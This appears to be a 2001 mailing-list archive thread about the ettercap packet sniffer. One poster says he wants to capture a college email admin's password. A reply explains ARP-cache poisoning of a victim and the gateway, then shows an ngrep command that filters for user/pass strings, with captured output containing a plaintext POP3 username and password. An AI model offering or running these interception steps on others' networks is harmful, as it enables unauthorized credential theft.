Re: ettercap anyone?

Subject: Re: ettercap anyone?
From: Cdowns (cdowns@lifeatzero.com)
Date: Mon Dec 03 2001 - 17:13:57 MST

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Next message: Mark Philip: "OSX vs. YDL - new"
• Previous message: Zeke Runyon: "Re: Telnet server and FTP server setup"
• In reply to: Reid Anderson: "Re: ettercap anyone?"
• Next in thread: Cdowns: "Re: ettercap anyone?"
• Next in thread: Reid Anderson: "Re: ettercap anyone?"
• Reply: Cdowns: "Re: ettercap anyone?"

this is the easy way with ngrep

scumbag# ngrep -wiA2 'user|pass'
interface: xe0 (192.168.20.0/255.255.255.0)
match: ((^user|pass\W)|(\Wuser|pass$)|(\Wuser|pass\W))
#####
T 192.168.20.118:3185 -> 64.39.89.37:110 [AP]
  USER scumbag..
#
T 64.39.89.37:110 -> 192.168.20.118:3185 [A]
#
T 64.39.89.37:110 -> 192.168.20.118:3185 [AP]
  +OK ..
#
T 192.168.20.118:3185 -> 64.39.89.37:110 [AP]
  PASS P71ZpXcr77d..
#
T 64.39.89.37:110 -> 192.168.20.118:3185 [AP]
  +OK ..
#
T 192.168.20.118:3185 -> 64.39.89.37:110 [AP]
  STAT..
#######

~>D

Reid Anderson wrote:

> using ettercap, I get told that I can't ARP myself! I would like to do
> this to myself before anyone else...
>
> On Monday, December 3, 2001, at 06:42 PM, Cdowns wrote:
>
> > all you have to do is select the src as the machine you want to grab (
> > password ) and then dest as the gateway and hit "a" (for APR becuase
> > you
> > will need to poison the ARP cache of both machines on the keyboard) sit
> > back and wait. Cake walk. you could also use ngrep which will do this
> > very
> > easily.
> >
> > ~>D
> >
> > Reid Anderson wrote:
> >
> >> Has anyone used ettercap before? It is a packet sniffer that I am
> >> trying
> >> to use to prove to our silly College Email Admins that we need to use
> >> secure email passwords and that our web based email system is highly
> >> unsecure. I am trying to packet sniff my own machine first (it's a
> >> little more legal that way) and then I might just get the email admins
> >> password and send her a message from herself! Anyway, If anyone has
> >> used
> >> ettercap (or any other packet sniffer that might run under OS X), could
> >> you please tell me a little more about using it other than what it has
> >> in ettercap --help. I have been able to view thge html code being
> >> viewed by many people, but only within my own subnet 150.209.130.x
> >> but I
> >> would like to be able to see outside my subnet to the general domain
> >> 150.209.x.x. Any help would be greatly appreciated!
> >>
> >> Thanks
> >> Reid Anderson
> >> resander@cs.hamilton.edu
> >

• Next message: Mark Philip: "OSX vs. YDL - new"
• Previous message: Zeke Runyon: "Re: Telnet server and FTP server setup"
• In reply to: Reid Anderson: "Re: ettercap anyone?"
• Next in thread: Cdowns: "Re: ettercap anyone?"
• Next in thread: Reid Anderson: "Re: ettercap anyone?"
• Reply: Cdowns: "Re: ettercap anyone?"

This archive was generated by hypermail 2a24 : Mon Dec 03 2001 - 17:36:14 MST